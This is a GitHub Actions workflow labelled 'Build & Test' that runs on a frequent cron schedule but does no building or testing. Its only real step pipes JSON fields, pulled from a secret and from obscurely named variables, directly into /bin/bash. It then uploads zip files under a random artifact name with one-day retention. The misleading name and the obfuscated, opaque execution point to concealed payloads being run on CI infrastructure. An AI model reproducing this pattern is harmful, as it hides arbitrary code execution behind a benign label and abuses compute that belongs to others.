name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '22 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Start
        env:
          lb6: ${{ secrets.lb6 }}
        run: |
          printf '%s' "$lb6" | jq -r .l05344 | /bin/bash
          echo $mpon156 | jq -r .gx874 | /bin/bash
          printf '%s' "$dp4903" | jq -r .n2358 | /bin/bash
          printf '%s' "$f131" | jq -r .wia02 | /bin/bash
          printf '%s' "$tfs1" | jq -r .nyzl73050 | /bin/bash
          echo $tm1854 | jq -r .v11 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: CziYfzkH
          path: "*.zip"
          retention-days: 1
